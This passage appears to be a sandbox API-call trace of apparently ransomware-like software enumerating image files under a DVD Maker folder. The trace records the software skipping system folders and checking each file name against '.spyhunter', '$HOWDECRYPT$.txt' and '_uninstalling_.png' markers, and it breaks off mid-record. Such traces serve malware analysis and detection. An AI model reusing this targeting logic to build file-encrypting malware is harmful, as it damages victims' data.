lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.575] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0092.575] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationUp_ButtonGraphic.png") returned 92 [0092.575] GetProcessHeap () returned 0x2c0000 [0092.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xfa) returned 0x381da8 [0092.576] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1648) returned 0x2c310e0 [0092.576] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.576] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="Windows") returned -1 [0092.576] lstrlenW (lpString="Windows") returned 7 [0092.576] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="$Recycle.bin") returned 1 [0092.576] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.576] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="System Volume Information") returned -1 [0092.576] lstrlenW (lpString="System Volume Information") returned 25 [0092.576] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationUp_SelectionSubpicture.png") returned 98 [0092.576] StrStrIW (lpFirst="NavigationUp_SelectionSubpicture.png", lpSrch=".spyhunter") returned 0x0 [0092.576] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.576] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0092.576] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationUp_SelectionSubpicture.png") returned 98 [0092.576] GetProcessHeap () returned 0x2c0000 [0092.576] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x106) returned 0x37b228 [0092.576] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1650) returned 0x2c310e0 [0092.576] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0092.576] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0092.577] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\$HOWDECRYPT$.txt") returned 78 [0092.577] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\$HOWDECRYPT$.txt") returned 78 [0092.577] GetProcessHeap () returned 0x2c0000 [0092.577] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xde) returned 0x378390 [0092.577] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1658) returned 0x2c310e0 [0092.577] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.587] lstrcmpiW (lpString1="Memories", lpString2="Windows") returned -1 [0092.587] lstrlenW (lpString="Windows") returned 7 [0092.587] lstrcmpiW (lpString1="Memories", lpString2="$Recycle.bin") returned 1 [0092.587] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.587] lstrcmpiW (lpString1="Memories", lpString2="System Volume Information") returned -1 [0092.587] lstrlenW (lpString="System Volume Information") returned 25 [0092.587] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories") returned 56 [0092.587] lstrcmpW (lpString1="Memories", lpString2=".") returned 1 [0092.587] lstrcmpW (lpString1="Memories", lpString2="..") returned 1 [0092.587] GetProcessHeap () returned 0x2c0000 [0092.587] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c11050 [0092.587] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\*") returned 58 [0092.587] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0092.702] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0092.702] lstrlenW (lpString="Windows") returned 7 [0092.702] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0092.702] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.702] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0092.702] lstrlenW (lpString="System Volume Information") returned 25 [0092.702] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\.") returned 58 [0092.702] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.702] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.702] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0092.702] lstrlenW (lpString="Windows") returned 7 [0092.702] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0092.703] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.703] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0092.703] lstrlenW (lpString="System Volume Information") returned 25 [0092.703] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\..") returned 59 [0092.703] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.703] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.703] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.703] lstrcmpiW (lpString1="16_9-frame-background.png", lpString2="Windows") returned -1 [0092.703] lstrlenW (lpString="Windows") returned 7 [0092.703] lstrcmpiW (lpString1="16_9-frame-background.png", lpString2="$Recycle.bin") returned 1 [0092.703] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.703] lstrcmpiW (lpString1="16_9-frame-background.png", lpString2="System Volume Information") returned -1 [0092.703] lstrlenW (lpString="System Volume Information") returned 25 [0092.703] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-background.png") returned 82 [0092.703] StrStrIW (lpFirst="16_9-frame-background.png", lpSrch=".spyhunter") returned 0x0 [0092.703] lstrcmpW (lpString1="16_9-frame-background.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.703] lstrcmpW (lpString1="16_9-frame-background.png", lpString2="_uninstalling_.png") returned 1 [0092.703] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-background.png") returned 82 [0092.703] GetProcessHeap () returned 0x2c0000 [0092.703] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe6) returned 0x34ee78 [0092.703] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14e8) returned 0x2c310e0 [0092.703] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.703] lstrcmpiW (lpString1="16_9-frame-highlight.png", lpString2="Windows") returned -1 [0092.703] lstrlenW (lpString="Windows") returned 7 [0092.703] lstrcmpiW (lpString1="16_9-frame-highlight.png", lpString2="$Recycle.bin") returned 1 [0092.703] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.703] lstrcmpiW (lpString1="16_9-frame-highlight.png", lpString2="System Volume Information") returned -1 [0092.703] lstrlenW (lpString="System Volume Information") returned 25 [0092.703] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-highlight.png") returned 81 [0092.704] StrStrIW (lpFirst="16_9-frame-highlight.png", lpSrch=".spyhunter") returned 0x0 [0092.704] lstrcmpW (lpString1="16_9-frame-highlight.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.704] lstrcmpW (lpString1="16_9-frame-highlight.png", lpString2="_uninstalling_.png") returned 1 [0092.704] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-highlight.png") returned 81 [0092.704] GetProcessHeap () returned 0x2c0000 [0092.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x34f148 [0092.704] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14f0) returned 0x2c310e0 [0092.704] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.704] lstrcmpiW (lpString1="16_9-frame-image-mask.png", lpString2="Windows") returned -1 [0092.704] lstrlenW (lpString="Windows") returned 7 [0092.704] lstrcmpiW (lpString1="16_9-frame-image-mask.png", lpString2="$Recycle.bin") returned 1 [0092.704] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.704] lstrcmpiW (lpString1="16_9-frame-image-mask.png", lpString2="System Volume Information") returned -1 [0092.704] lstrlenW (lpString="System Volume Information") returned 25 [0092.704] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-image-mask.png") returned 82 [0092.704] StrStrIW (lpFirst="16_9-frame-image-mask.png", lpSrch=".spyhunter") returned 0x0 [0092.704] lstrcmpW (lpString1="16_9-frame-image-mask.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.704] lstrcmpW (lpString1="16_9-frame-image-mask.png", lpString2="_uninstalling_.png") returned 1 [0092.704] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-image-mask.png") returned 82 [0092.704] GetProcessHeap () returned 0x2c0000 [0092.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe6) returned 0x34f058 [0092.704] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14f8) returned 0x2c310e0 [0092.704] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.704] lstrcmpiW (lpString1="16_9-frame-overlay.png", lpString2="Windows") returned -1 [0092.705] lstrlenW (lpString="Windows") returned 7 [0092.705] lstrcmpiW (lpString1="16_9-frame-overlay.png", lpString2="$Recycle.bin") returned 1 [0092.705] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.705] lstrcmpiW (lpString1="16_9-frame-overlay.png", lpString2="System Volume Information") returned -1 [0092.705] lstrlenW (lpString="System Volume Information") returned 25 [0092.705] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-overlay.png") returned 79 [0092.705] StrStrIW (lpFirst="16_9-frame-overlay.png", lpSrch=".spyhunter") returned 0x0 [0092.705] lstrcmpW (lpString1="16_9-frame-overlay.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.705] lstrcmpW (lpString1="16_9-frame-overlay.png", lpString2="_uninstalling_.png") returned 1 [0092.705] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-overlay.png") returned 79 [0092.705] GetProcessHeap () returned 0x2c0000 [0092.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x377e20 [0092.705] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1500) returned 0x2c310e0 [0092.705] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.705] lstrcmpiW (lpString1="background.png", lpString2="Windows") returned -1 [0092.705] lstrlenW (lpString="Windows") returned 7 [0092.705] lstrcmpiW (lpString1="background.png", lpString2="$Recycle.bin") returned 1 [0092.705] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.705] lstrcmpiW (lpString1="background.png", lpString2="System Volume Information") returned -1 [0092.705] lstrlenW (lpString="System Volume Information") returned 25 [0092.705] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\background.png") returned 71 [0092.705] StrStrIW (lpFirst="background.png", lpSrch=".spyhunter") returned 0x0 [0092.705] lstrcmpW (lpString1="background.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.706] lstrcmpW (lpString1="background.png", lpString2="_uninstalling_.png") returned 1 [0092.706] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\background.png") returned 71 [0092.706] GetProcessHeap () returned 0x2c0000 [0092.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x37e3b0 [0092.706] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1508) returned 0x2c310e0 [0092.706] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.706] lstrcmpiW (lpString1="btn-back-static.png", lpString2="Windows") returned -1 [0092.706] lstrlenW (lpString="Windows") returned 7 [0092.706] lstrcmpiW (lpString1="btn-back-static.png", lpString2="$Recycle.bin") returned 1 [0092.706] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.706] lstrcmpiW (lpString1="btn-back-static.png", lpString2="System Volume Information") returned -1 [0092.706] lstrlenW (lpString="System Volume Information") returned 25 [0092.706] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-back-static.png") returned 76 [0092.706] StrStrIW (lpFirst="btn-back-static.png", lpSrch=".spyhunter") returned 0x0 [0092.706] lstrcmpW (lpString1="btn-back-static.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.706] lstrcmpW (lpString1="btn-back-static.png", lpString2="_uninstalling_.png") returned 1 [0092.706] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-back-static.png") returned 76 [0092.706] GetProcessHeap () returned 0x2c0000 [0092.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x3780d8 [0092.706] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1510) returned 0x2c310e0 [0092.706] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.706] lstrcmpiW (lpString1="btn-next-static.png", lpString2="Windows") returned -1 [0092.706] lstrlenW (lpString="Windows") returned 7 [0092.706] lstrcmpiW (lpString1="btn-next-static.png", lpString2="$Recycle.bin") returned 1 [0092.707] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.707] lstrcmpiW (lpString1="btn-next-static.png", lpString2="System Volume Information") returned -1 [0092.707] lstrlenW (lpString="System Volume Information") returned 25 [0092.707] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-next-static.png") returned 76 [0092.707] StrStrIW (lpFirst="btn-next-static.png", lpSrch=".spyhunter") returned 0x0 [0092.707] lstrcmpW (lpString1="btn-next-static.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.707] lstrcmpW (lpString1="btn-next-static.png", lpString2="_uninstalling_.png") returned 1 [0092.707] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-next-static.png") returned 76 [0092.707] GetProcessHeap () returned 0x2c0000 [0092.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x377ff0 [0092.707] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1518) returned 0x2c310e0 [0092.707] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.708] lstrcmpiW (lpString1="btn-previous-static.png", lpString2="Windows") returned -1 [0092.708] lstrlenW (lpString="Windows") returned 7 [0092.708] lstrcmpiW (lpString1="btn-previous-static.png", lpString2="$Recycle.bin") returned 1 [0092.708] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.708] lstrcmpiW (lpString1="btn-previous-static.png", lpString2="System Volume Information") returned -1 [0092.708] lstrlenW (lpString="System Volume Information") returned 25 [0092.708] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-previous-static.png") returned 80 [0092.708] StrStrIW (lpFirst="btn-previous-static.png", lpSrch=".spyhunter") returned 0x0 [0092.708] lstrcmpW (lpString1="btn-previous-static.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.708] lstrcmpW (lpString1="btn-previous-static.png", lpString2="_uninstalling_.png") returned 1 [0092.708] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-previous-static.png") returned 80 [0092.708] GetProcessHeap () returned 0x2c0000 [0092.708] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x34f508 [0092.708] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1520) returned 0x2c310e0 [0092.708] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.708] lstrcmpiW (lpString1="button-highlight.png", lpString2="Windows") returned -1 [0092.708] lstrlenW (lpString="Windows") returned 7 [0092.708] lstrcmpiW (lpString1="button-highlight.png", lpString2="$Recycle.bin") returned 1 [0092.708] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.708] lstrcmpiW (lpString1="button-highlight.png", lpString2="System Volume Information") returned -1 [0092.708] lstrlenW (lpString="System Volume Information") returned 25 [0092.708] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\button-highlight.png") returned 77 [0092.708] StrStrIW (lpFirst="button-highlight.png", lpSrch=".spyhunter") returned 0x0 [0092.709] lstrcmpW (lpString1="button-highlight.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.709] lstrcmpW (lpString1="button-highlight.png", lpString2="_uninstalling_.png") returned 1 [0092.709] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\button-highlight.png") returned 77 [0092.709] GetProcessHeap () returned 0x2c0000 [0092.709] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x3781c0 [0092.709] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1528) returned 0x2c310e0 [0092.709] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.709] lstrcmpiW (lpString1="button-overlay.png", lpString2="Windows") returned -1 [0092.709] lstrlenW (lpString="Windows") returned 7 [0092.709] lstrcmpiW (lpString1="button-overlay.png", lpString2="$Recycle.bin") returned 1 [0092.709] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.709] lstrcmpiW (lpString1="button-overlay.png", lpString2="System Volume Information") returned -1 [0092.709] lstrlenW (lpString="System Volume Information") returned 25 [0092.709] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\button-overlay.png") returned 75 [0092.709] StrStrIW (lpFirst="button-overlay.png", lpSrch=".spyhunter") returned 0x0 [0092.709] lstrcmpW (lpString1="button-overlay.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.709] lstrcmpW (lpString1="button-overlay.png", lpString2="_uninstalling_.png") returned 1 [0092.709] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\button-overlay.png") returned 75 [0092.709] GetProcessHeap () returned 0x2c0000 [0092.709] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd8) returned 0x346b88 [0092.709] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1530) returned 0x2c310e0 [0092.709] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.709] lstrcmpiW (lpString1="Memories_buttonClear.png", lpString2="Windows") returned -1 [0092.709] lstrlenW (lpString="Windows") returned 7 [0092.709] lstrcmpiW (lpString1="Memories_buttonClear.png", lpString2="$Recycle.bin") returned 1 [0092.709] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.709] lstrcmpiW (lpString1="Memories_buttonClear.png", lpString2="System Volume Information") returned -1 [0092.710] lstrlenW (lpString="System Volume Information") returned 25 [0092.710] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Memories_buttonClear.png") returned 81 [0092.710] StrStrIW (lpFirst="Memories_buttonClear.png", lpSrch=".spyhunter") returned 0x0 [0092.710] lstrcmpW (lpString1="Memories_buttonClear.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.710] lstrcmpW (lpString1="Memories_buttonClear.png", lpString2="_uninstalling_.png") returned 1 [0092.710] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Memories_buttonClear.png") returned 81 [0092.710] GetProcessHeap () returned 0x2c0000 [0092.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x34f328 [0092.710] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1538) returned 0x2c310e0 [0092.710] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.710] lstrcmpiW (lpString1="Notes_btn-back-static.png", lpString2="Windows") returned -1 [0092.710] lstrlenW (lpString="Windows") returned 7 [0092.710] lstrcmpiW (lpString1="Notes_btn-back-static.png", lpString2="$Recycle.bin") returned 1 [0092.710] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.710] lstrcmpiW (lpString1="Notes_btn-back-static.png", lpString2="System Volume Information") returned -1 [0092.710] lstrlenW (lpString="System Volume Information") returned 25 [0092.710] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Notes_btn-back-static.png") returned 82 [0092.710] StrStrIW (lpFirst="Notes_btn-back-static.png", lpSrch=".spyhunter") returned 0x0 [0092.710] lstrcmpW (lpString1="Notes_btn-back-static.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.710] lstrcmpW (lpString1="Notes_btn-back-static.png", lpString2="_uninstalling_.png") returned 1 [0092.710] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Notes_btn-back-static.png") returned 82 [0092.710] GetProcessHeap () returned 0x2c0000 [0092.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe6) returned 0x34f238 [0092.710] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1540) returned 0x2c310e0 [0092.710] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.710] lstrcmpiW (lpString1="Notes_content-background.png", lpString2="Windows") returned -1 [0092.711] lstrlenW (lpString="Windows") returned 7 [0092.713] lstrcmpiW (lpString1="Notes_content-background.png", lpString2="$Recycle.bin") returned 1 [0092.713] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.714] lstrcmpiW (lpString1="Notes_content-background.png", lpString2="System Volume Information") returned -1 [0092.714] lstrlenW (lpString="System Volume Information") returned 25 [0092.714] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Notes_content-background.png") returned 85 [0092.714] StrStrIW (lpFirst="Notes_content-background.png", lpSrch=".spyhunter") returned 0x0 [0092.714] lstrcmpW (lpString1="Notes_content-background.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.714] lstrcmpW (lpString1="Notes_content-background.png", lpString2="_uninstalling_.png") returned 1 [0092.714] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Notes_content-background.png") returned 85 [0092.714] GetProcessHeap () returned 0x2c0000 [0092.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xec) returned 0x3553b0 [0092.714] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1548) returned 0x2c310e0 [0092.714] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.714] lstrcmpiW (lpString1="scrapbook.png", lpString2="Windows") returned -1 [0092.714] lstrlenW (lpString="Windows") returned 7 [0092.714] lstrcmpiW (lpString1="scrapbook.png", lpString2="$Recycle.bin") returned 1 [0092.714] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.714] lstrcmpiW (lpString1="scrapbook.png", lpString2="System Volume Information") returned -1 [0092.714] lstrlenW (lpString="System Volume Information") returned 25 [0092.714] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\scrapbook.png") returned 70 [0092.714] StrStrIW (lpFirst="scrapbook.png", lpSrch=".spyhunter") returned 0x0 [0092.714] lstrcmpW (lpString1="scrapbook.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.714] lstrcmpW (lpString1="scrapbook.png", lpString2="_uninstalling_.png") returned 1 [0092.714] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\scrapbook.png") returned 70 [0092.714] GetProcessHeap () returned 0x2c0000 [0092.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xce) returned 0x37e560 [0092.714] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1550) returned 0x2c310e0 [0092.715] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.715] lstrcmpiW (lpString1="Title_content-background.png", lpString2="Windows") returned -1 [0092.715] lstrlenW (lpString="Windows") returned 7 [0092.715] lstrcmpiW (lpString1="Title_content-background.png", lpString2="$Recycle.bin") returned 1 [0092.715] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.715] lstrcmpiW (lpString1="Title_content-background.png", lpString2="System Volume Information") returned 1 [0092.715] lstrlenW (lpString="System Volume Information") returned 25 [0092.715] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_content-background.png") returned 85 [0092.715] StrStrIW (lpFirst="Title_content-background.png", lpSrch=".spyhunter") returned 0x0 [0092.715] lstrcmpW (lpString1="Title_content-background.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.715] lstrcmpW (lpString1="Title_content-background.png", lpString2="_uninstalling_.png") returned 1 [0092.715] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_content-background.png") returned 85 [0092.715] GetProcessHeap () returned 0x2c0000 [0092.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xec) returned 0x3555a0 [0092.715] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1558) returned 